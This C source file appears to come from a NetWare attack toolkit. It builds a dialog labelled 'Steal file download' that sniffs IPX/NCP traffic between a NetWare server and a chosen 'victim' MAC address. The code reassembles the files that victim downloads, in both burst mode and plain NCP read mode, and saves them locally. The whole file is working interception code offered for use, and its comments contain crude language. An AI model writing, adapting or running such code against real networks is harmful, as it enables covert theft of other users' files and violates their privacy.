#include "panrcp.h"

/* Preference variables*/
MOBJECT manual_screen;
MOBJECT number,result,my_addr,server_addr,pref_save;

void QuitFileSniff(MOBJECT p, void *s, void *v)
{
 MShellDestroy(p);
}

void SelectSavePath(MOBJECT p, void *s, void *v)
{
 char path[MAXPATHLEN];

 path[0]='\0';
 if (MFileSelection("Save path ...", NULL, NULL, path, True))
  {
   strncpy(preference.save_path,path,MAXPATHLEN);
   MEditChangeText(pref_save,0,strlen(preference.save_path),
                   preference.save_path,MAXPATHLEN);
   MEditSetCursorPos(pref_save,0);
  }
}

void FileSniff(MOBJECT p, void *s, void *v)
{
 uint32 length;
 int FOUND,err,times;
 short marker;
 Packet_Info *pInfoIn=(Packet_Info *)calloc(1,sizeof(Packet_Info));
 Packet_Info *pInfoOut=(Packet_Info *)calloc(1,sizeof(Packet_Info));
 uint8 *file_data=(uint8 *)malloc(16*sizeof(uint8));
 uint8 i,j,temp,pos,path_items,sequence;
 char string[20],filename[512],writefile[MAXPATHLEN+MAXFNAMELEN];
 uint16 datalen;
 uint32 total_datalen;

 if (Pan_Adapter)
  {
   times=atoi(MEditValue(number));
   strncpy(string,MEditValue(my_addr),12);
   str_to_hex(string,pInfoOut->my_addr,12);
   strncpy(string,MEditValue(server_addr),12);
   str_to_hex(string,pInfoOut->server_addr,12);

   GUI_Pan_Buffered_Adapter(256000);

   MEditChangeText(result, 0, 42, "Sniffing files... please wait...", 42);

   for(j=0;j<times;j++)
    {

     FOUND=FALSE;
     memset(filename,0,512);
     total_datalen=0;

     /* wait for file download request */
     do
      {
       GUI_Pan_Sniff_from_Multi(pInfoIn->to_server,&length);
       /* we add BPF_LEN to marker to skip the BPF header included in each
          packet we read since NDIS packet driver V2 */
       /* TO BE MODIFIED FOR LINUX PORT */
       /* if IPX packet from victim to server, NDS request, open file */
       if(
          (!memcmp(pInfoIn->to_server+36+BPF_LEN,pInfoOut->my_addr,6))&&
          (!memcmp(pInfoIn->to_server+24+BPF_LEN,pInfoOut->server_addr,6))&&
          (pInfoIn->to_server[19+BPF_LEN]==0x11)&& /* Novell packet */
          (pInfoIn->to_server[44+BPF_LEN]==0x22)&& /* NDS request */
          (pInfoIn->to_server[50+BPF_LEN]==0x57)&& /* file activity */
          (pInfoIn->to_server[51+BPF_LEN]==0x01)&&
          (pInfoIn->to_server[53+BPF_LEN]==0x01)   /* open */
         )
        {
         /* match filename */
         path_items=pInfoIn->to_server[BPF_LEN+72];
         pos=BPF_LEN+73;
         temp=pos;
       
         for(i=1;i<path_items;i++)
          {
           pos+=pInfoIn->to_server[temp]+1;
           temp=pos;
          }

         memcpy(filename,pInfoIn->to_server+pos+1,
                pInfoIn->to_server[pos]);

         FOUND=TRUE;
        }
      } while(!FOUND);

     FOUND=FALSE;
     /* capture the file exchange */
     do
      {
       GUI_Pan_Sniff_from_Multi(pInfoIn->to_server,&length);

       /* packet from file download, using netware Burst mode ?? */
       if
        (
         (!memcmp(pInfoIn->to_server+36+BPF_LEN,pInfoOut->server_addr,6))&&
         (!memcmp(pInfoIn->to_server+24+BPF_LEN,pInfoOut->my_addr,6))&&
         (pInfoIn->to_server[19+BPF_LEN]==0x11)&& /* Novell packet */
         (pInfoIn->to_server[44+BPF_LEN]==0x77)&& /* Netware Burst (file transfer) */
         (pInfoIn->to_server[45+BPF_LEN]==0x77)
        )
         {
          /* if this is the first packet in the Burst transfer, we must account */
          /* for the additional header of 8 chars */
          /* This is the case if the burst offset is set to 0 */
          if(
             (pInfoIn->to_server[BPF_LEN+72]==0)&&
             (pInfoIn->to_server[BPF_LEN+73]==0)&&
             (pInfoIn->to_server[BPF_LEN+74]==0)&&
             (pInfoIn->to_server[BPF_LEN+75]==0)
            )
             marker=8;
          else marker=0;

          /* I just can't say how much I hate Intel for forcing me to */
          /* deal with that fucking byte ordering shit */
          datalen=swap_uint16(*(uint16 *)(pInfoIn->to_server+BPF_LEN+76));
          datalen-=marker;

          /* the maximum file size would be 256Mo.. enough huh ?*/
          total_datalen+=datalen;
          /* very improbable, but who knows ... */
          if (total_datalen==-1) break;
          /* adjust the temporary memory size to receive the new packet */
          file_data=realloc(file_data,(1+total_datalen)*sizeof(uint8));
          /* but hey, maybe we've exhausted memory, and i'd hate to see */
          /* pandora crash */
          if (!file_data) break;
          /* time to copy the data, bab' */
          memcpy(file_data+total_datalen-datalen,
                 pInfoIn->to_server+80+BPF_LEN+marker,
                 datalen);
          goto next; /* yes goto's are ugly in C code, but sometimes */
                     /* it allows to optimize routines will little overhead */
         }

       /* packet from file download, using old netware NCP mode ?? */
       if
        (
         (!memcmp(pInfoIn->to_server+36+BPF_LEN,pInfoOut->my_addr,6))&&
         (!memcmp(pInfoIn->to_server+24+BPF_LEN,pInfoOut->server_addr,6))&&
         (pInfoIn->to_server[19+BPF_LEN]==0x11)&& /* Novell packet */
         (pInfoIn->to_server[44+BPF_LEN]==0x22)&& /* Netware request */
         (pInfoIn->to_server[50+BPF_LEN]==0x48)   /* read from file */
        )
         {
          /* we wait for server reply to this request */
          sequence=pInfoIn->to_server[46+BPF_LEN];
  /* ugly but effective use of goto, besides i'm tired of using 'while' */
  again:
          GUI_Pan_Sniff_from_Multi(pInfoIn->to_server,&length);
          if
           (
            (!memcmp(pInfoIn->to_server+36+BPF_LEN,pInfoOut->server_addr,6))&&
            (!memcmp(pInfoIn->to_server+24+BPF_LEN,pInfoOut->my_addr,6))&&
            (pInfoIn->to_server[19+BPF_LEN]==0x11)&& /* Novell packet */
            (pInfoIn->to_server[44+BPF_LEN]==0x33)&& /* Netware reply */
            (pInfoIn->to_server[46+BPF_LEN]==sequence) /* to previous packet */
           );
          else goto again;

          /* I just can't say how much I hate Intel for forcing me to */
          /* deal with that fucking byte ordering shit */
          datalen=swap_uint16(*(uint16 *)(pInfoIn->to_server+BPF_LEN+52));

          /* the maximum file size would be 256Mo.. enough huh ?*/
          total_datalen+=datalen;
          /* very improbable, but who knows ... */
          if (total_datalen==-1) break;
          /* adjust the temporary memory size to receive the new packet */
          file_data=realloc(file_data,(1+total_datalen)*sizeof(uint8));
          /* but hey, maybe we've exhausted memory, and i'd hate to see */
          /* pandora crash */
          if (!file_data) break;
          /* time to copy the data, bab' */
          memcpy(file_data+total_datalen-datalen,
                 pInfoIn->to_server+54+BPF_LEN,
                 datalen);
          goto next; /* yes goto's are ugly in C code, but sometimes */
                     /* it allows to optimize routines will little overhead */
         }

       /* or maybe transfer is finished ?? */
       if
         (
          (!memcmp(pInfoIn->to_server+36+BPF_LEN,pInfoOut->my_addr,6))&&
          (!memcmp(pInfoIn->to_server+24+BPF_LEN,pInfoOut->server_addr,6))&&
          (pInfoIn->to_server[19+BPF_LEN]==0x11)&& /* Novell packet */
          (pInfoIn->to_server[44+BPF_LEN]==0x22)&& /* NDS request */
          (pInfoIn->to_server[50+BPF_LEN]==0x42)   /* close file */
         ) FOUND=TRUE; /* download finished */
  next:
      } while(!FOUND);


     strcpy(writefile,preference.save_path);
     strcat(writefile,filename);
     err=Pan_file_write_unik(writefile,file_data,total_datalen);
    }
   MEditChangeText(result, 0, 42, "Done.", 42);
  }
 else MEditChangeText(result, 0, 42, "Adapter not opened", 42);

 free(pInfoIn);
 free(pInfoOut);
 free(file_data);
}

void file_sniff(MOBJECT o, void *o_data, void *a_data)
{
 MOBJECT form_id;
 MOBJECT label;
 MOBJECT sel_save;

 manual_screen = MCreateShell("Steal file download", SF_MODAL);
 MObjectSetBackgroundRGB(manual_screen, 56, 112, 112);

 form_id = MCreateRowForm(manual_screen);
 MObjectSetBackgroundRGB(form_id, 56, 112, 112);

 label = MCreateLabel(form_id, "From IPX Server (6b usually 000000000001)", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 server_addr = MCreateClippedEdit(form_id, "000000000001", 12, 12, FIXED_SMALL);
 MRightAttach(server_addr, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(server_addr, 56, 112, 112);
 MObjectSetForegroundRGB(server_addr, 192, 176, 160);

 label = MCreateLabel(form_id, "To victim MAC address (6 bytes hex)", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 my_addr = MCreateClippedEdit(form_id, "", 12, 12, FIXED_SMALL);
 MRightAttach(my_addr, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(my_addr, 56, 112, 112);
 MObjectSetForegroundRGB(my_addr, 192, 176, 160);

 label = MCreateLabel(form_id, "Number of file download to grabb", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 number = MCreateClippedEdit(form_id, "1", 3, 3, FIXED_SMALL);
 MRightAttach(number, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(number, 56, 112, 112);
 MObjectSetForegroundRGB(number, 192, 176, 160);

 label = MCreateLabel(form_id, "Save path", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 pref_save = MCreateClippedEdit(form_id, preference.save_path, MAXPATHLEN, 50, FIXED_SMALL);
 MRightAttach(pref_save, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(pref_save, 56, 112, 112);
 MObjectSetForegroundRGB(pref_save, 192, 176, 160);
 MObjectSetResize(pref_save, True, False);
 MObjectSetUnsensitive(pref_save);

 sel_save = MCreatePButton(form_id, "Select...", FIXED_SMALL);
 MRightAttach(sel_save, F_ATT_NONE, 3, NULL);
 MPButtonSetCallback(sel_save, SelectSavePath, 0L);

 result = MCreateClippedEdit(form_id, "What is he doing...", 42, 42, FIXED_SMALL);
 MRightAttach(result, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(result, 56, 112, 112);
 MObjectSetForegroundRGB(result, 192, 176, 160);
 MObjectSetUnsensitive(result);

 form_id = MCreateColForm(manual_screen);
 MObjectSetBackgroundRGB(form_id, 56, 112, 112);

 label = MCreatePButton(form_id, "SniffTheFiles!", FIXED_SMALL);
 MPButtonSetCallback(label, FileSniff, 0L);

 label = MCreatePButton(form_id, "Quit", FIXED_SMALL);
 MPButtonSetCallback(label, QuitFileSniff, 0L);

 MShellRealize(manual_screen);
}
/****************************************************************************/
